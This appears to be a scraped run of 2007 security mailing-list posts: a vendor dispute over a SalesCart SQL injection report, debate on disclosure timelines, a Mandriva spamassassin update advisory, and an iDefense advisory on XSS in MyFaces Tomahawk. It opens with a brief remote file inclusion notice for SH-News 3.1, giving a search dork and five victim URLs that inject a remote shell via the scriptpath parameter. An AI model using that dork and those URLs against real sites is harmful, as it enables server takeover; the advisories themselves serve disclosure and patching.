Found By : Hasadya Raed Contact : [EMAIL PROTECTED] --- Script : SH-News 3.1 Dork : Powered by SH-News 3.1 Greetz : Guardian Information Systems --- B.Files : report.php archive.php comments.php init.php news.php Exploits : http://www.Victim.Com/path/report.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/archive.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/comments.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/init.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/news.php?scriptpath=[Shell-Attack]
Re: RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability
Dear Accounting, I have legally posted vulnerability information on a mailing list specifically for this issue. The public is entitled to this information. It is up to the editors of the board to decide whether this vulnerability is fact or fiction. They don't post incorrect vulnerability information. Otherwise, I could simply say I have 15 remote root vulnerabilities affecting every linux kernel. If you would prefer for our company to look into your commercial product, we would be more than happy. For now, though, we would appreciate private and direct correspondence. Thank you, John Martinelli RedLevel.org Security On Jun 13, 2007, at 1:36 PM, [EMAIL PROTECTED] wrote: This is not true and is actually slander. He says no one responded; however, I personally talked with Mr. Martinelli and explained to him he was looking at an old out-of- date demo on the website that is not indicative of the released product. These tests were performed on a non-commercial product demo and are not indicative of the commercial product at all. We were able to reproduce this sql injection on this demo code but not on the released product. In addition, the product the customer is referring to is also completely obsolete. Mr. Martinelli's information is incorrect and down right slanderous in at least 3 or 4 accounts.
Re: Windows Oday release
On 2007-06-13 13:03-0400, Steven M. Christey wrote: The time line is also interesting, BTW: Disclosure timelines are some of the most entertaining and educational reading in security advisories. There's now (finally) enough data for somebody somewhere to do a quantitative study on reported timelines, including typical vendor response times, and issues in the process. (If someone wants to pursue this, feel free to contact me to bat ideas around.) A lot of researcher timelines show a delay between the original discovery and vendor notification. In some cases, this can be due to additional time required to prove that the discovery is exploitable in order to give a more reliable report to the vendor, but that's not always the case. Thomas Lim though knows what he is doing and willing to stand behind what he reports. Nowadays the vendors I am worried about are the open source ones. This is not about lost maintainers or non-existent patches, that's been done to death. Reporting vulnerabilities to distributions can be so depressing - and the replies you get (if any) are so annoying, that if it was from Microsoft, they would have been grilled in the press already for them. - Steve Gadi.
[ MDKSA-2007:125 ] - Updated spamassassin packages fix possible DoS condition
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:125 http://www.mandriva.com/security/ ___ Package : spamassassin Date: June 14, 2007 Affected: 2007.0, 2007.1, Corporate 4.0 ___ Problem Description: SpamAssassin 3.1.x, when running as root with unusual configuration options using vpopmail or virtual users, could allow local users to cause a denial of service (via corrupting arbitrary files) using a symlink attack on a file used by spamd. SpamAssassin 3.1.9, which corrects this flaw, is provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2873 http://spamassassin.apache.org/advisories/cve-2007-2873.txt ___ Updated Packages: Mandriva Linux 2007.0: 6868ff1682b0af4f4a1496d1b17b1abb 2007.0/i586/perl-Mail-SpamAssassin-3.1.9-0.1mdv2007.0.i586.rpm 1cedda8aa0bd35a0e745180a45a19979 2007.0/i586/spamassassin-3.1.9-0.1mdv2007.0.i586.rpm 00cffd46beb7733d24a7194e7a269f59 2007.0/i586/spamassassin-spamc-3.1.9-0.1mdv2007.0.i586.rpm 97a3c6aebaf515c2d07ae903e3ade97b 2007.0/i586/spamassassin-spamd-3.1.9-0.1mdv2007.0.i586.rpm 2d17ea30dbc1679f0770415a4f1e93bc 2007.0/i586/spamassassin-tools-3.1.9-0.1mdv2007.0.i586.rpm 5cd9896b49fed9eb8fc774167d74244c 2007.0/SRPMS/spamassassin-3.1.9-0.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 136b4b7726af7e858bdfd416a590bc69 2007.0/x86_64/perl-Mail-SpamAssassin-3.1.9-0.1mdv2007.0.x86_64.rpm d9e416f10cfc5ea29cc6f5fe683b5dda 2007.0/x86_64/spamassassin-3.1.9-0.1mdv2007.0.x86_64.rpm 7abe66bb43c8dd00cad3759664c6bf65 2007.0/x86_64/spamassassin-spamc-3.1.9-0.1mdv2007.0.x86_64.rpm 5ea0a2c56eb2ac07df39ec1a578ce385 2007.0/x86_64/spamassassin-spamd-3.1.9-0.1mdv2007.0.x86_64.rpm ef19bf0d92d5ba5191669bad149c78c5 2007.0/x86_64/spamassassin-tools-3.1.9-0.1mdv2007.0.x86_64.rpm 5cd9896b49fed9eb8fc774167d74244c 2007.0/SRPMS/spamassassin-3.1.9-0.1mdv2007.0.src.rpm Mandriva Linux 2007.1: c346bacaf0032d8b04c7d8d0fd3d5e58 2007.1/i586/perl-Mail-SpamAssassin-3.1.9-0.1mdv2007.1.i586.rpm bcf67361bf441a9e3b3783d0f3802449 2007.1/i586/spamassassin-3.1.9-0.1mdv2007.1.i586.rpm 524d9f34a21b63bd60e23f9e3b10ab72 2007.1/i586/spamassassin-spamc-3.1.9-0.1mdv2007.1.i586.rpm 4d15df1d52591e597b504801e3b48fa9 2007.1/i586/spamassassin-spamd-3.1.9-0.1mdv2007.1.i586.rpm 7d5394511014e74ec8f1407820fd0646 2007.1/i586/spamassassin-tools-3.1.9-0.1mdv2007.1.i586.rpm b261e57f3a15bd6f2c0b1d1fe731723d 2007.1/SRPMS/spamassassin-3.1.9-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 92b56f81d9602aa7c78799a368f5a227 2007.1/x86_64/perl-Mail-SpamAssassin-3.1.9-0.1mdv2007.1.x86_64.rpm 63d5278e935c222cc07ce10f25921a01 2007.1/x86_64/spamassassin-3.1.9-0.1mdv2007.1.x86_64.rpm c461b6faf2a7c6283d8380e9ff45c66f 2007.1/x86_64/spamassassin-spamc-3.1.9-0.1mdv2007.1.x86_64.rpm ea4ec4e59e5f7589bed9463fbcf09ccb 2007.1/x86_64/spamassassin-spamd-3.1.9-0.1mdv2007.1.x86_64.rpm eab7972520d2ff2dae31eb3facae2caa 2007.1/x86_64/spamassassin-tools-3.1.9-0.1mdv2007.1.x86_64.rpm b261e57f3a15bd6f2c0b1d1fe731723d 2007.1/SRPMS/spamassassin-3.1.9-0.1mdv2007.1.src.rpm Corporate 4.0: 91fe3692a86bc63d73b2cd65b9a7680d corporate/4.0/i586/perl-Mail-SpamAssassin-3.1.9-0.1.20060mlcs4.i586.rpm 576704ea8dc89097e611c5ffaf1e604f corporate/4.0/i586/spamassassin-3.1.9-0.1.20060mlcs4.i586.rpm 47fef4374240c6c6f7c475b675e620ee corporate/4.0/i586/spamassassin-spamc-3.1.9-0.1.20060mlcs4.i586.rpm c10a0adc7e9c1a0d4ee7ae7ca981fefc corporate/4.0/i586/spamassassin-spamd-3.1.9-0.1.20060mlcs4.i586.rpm f1d5308b7bcce9eed20028623b98fa02 corporate/4.0/i586/spamassassin-tools-3.1.9-0.1.20060mlcs4.i586.rpm e05b3f4264eccec4af0204b2d86009e0 corporate/4.0/SRPMS/spamassassin-3.1.9-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: ee0e50378b04981186e363e9ffd46a0c corporate/4.0/x86_64/perl-Mail-SpamAssassin-3.1.9-0.1.20060mlcs4.x86_64.rpm deb4f200369c92ece52b62dd40485ec1 corporate/4.0/x86_64/spamassassin-3.1.9-0.1.20060mlcs4.x86_64.rpm bef27fbaf42eea12e584a0ebca872b77 corporate/4.0/x86_64/spamassassin-spamc-3.1.9-0.1.20060mlcs4.x86_64.rpm ed5b1d4c8e9c65dbe47e3c52d98928f5 corporate/4.0/x86_64/spamassassin-spamd-3.1.9-0.1.20060mlcs4.x86_64.rpm 287bde6ce88bb820d788e0017b19d39b corporate/4.0/x86_64/spamassassin-tools-3.1.9-0.1.20060mlcs4.x86_64.rpm e05b3f4264eccec4af0204b2d86009e0 corporate/4.0/SRPMS/spamassassin-3.1.9-0.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and
Re: [Full-disclosure] Windows Oday release
What is funny however, is that Microsoft, the great supporter of responsible disclosure actually is the main sponsor (patron) of the SyScan conference: http://syscan.org/ which is organized by Thomas. Maybe it's a sign that Microsoft realized that free responsible disclosure idea is a bit artificial? (at last!) No doubt. Security research is an establishing market. If vendors won't pay to know about their bugs others certainly will. Jared :)
Re: [MajorSecurity Advisory #47]Simple Machines Forum (SMF) - Session fixation Issue
This is only possible if session.use_transid is enabled in the php.ini
iDefense Security Advisory 06.14.07: Apache MyFaces Tomahawk JSF Framework Cross-Site Scripting (XSS) Vulnerability
Apache MyFaces Tomahawk JSF Framework Cross-Site Scripting (XSS) Vulnerability iDefense Security Advisory 06.14.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 14, 2007 I. BACKGROUND Java Server Faces, JSF, is a framework used to create server side GUI Web applications. It is comparable to the Java Struts framework. Apache MyFaces Tomahawk is an open source implementation of JSF. The Tomahawk version contains Apache extensions to the base specification. More information is available at the following URL. http://myfaces.apache.org/ II. DESCRIPTION Remote exploitation of an input validation vulnerability in Apache Software Foundation's MyFaces Tomahawk JSF framework could allow an attacker to perform a cross-site scripting (XSS) attack. The code responsible for parsing HTTP requests is vulnerable to an XSS vulnerability. When parsing the 'autoscroll' parameter from a POST or GET request, the value of this variable is directly inserted into JavaScript that is sent back to the client. This allows an attacker to run arbitrary JavaScript in the context of the affected domain of the MyFaces application being targeted. III. ANALYSIS Successful exploitation of this vulnerability allows an attacker to conduct an XSS attack on a user. This could allow an attacker to steal cookies, inject content into pages, or submit requests using the user's credentials. To exploit this vulnerability, an attacker must use social engineering techniques to persuade the user to click a link to a Web application that uses MyFaces Tomahawk. In the following example, the [javascript] portion of the request would be present unfiltered in the returned content. http://www.vulnerable.tld/some_app.jsf?autoscroll=[javascript] IV. DETECTION iDefense has confirmed the existence of this vulnerability in MyFaces Tomahawk version 1.1.5. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE The Apache Software Foundation MyFaces team has addressed this vulnerability by releasing version 1.1.6 of MyFaces Tomahawk. More information can be found at the following URL. http://issues.apache.org/jira/secure/ReleaseNote.jspa?version=12312536styleName=TextprojectId=12310272 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3101 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/05/2007 Initial vendor notification 06/05/2007 Initial vendor response 06/14/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Rajat Swarup of VeriSign Global Security Consulting. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.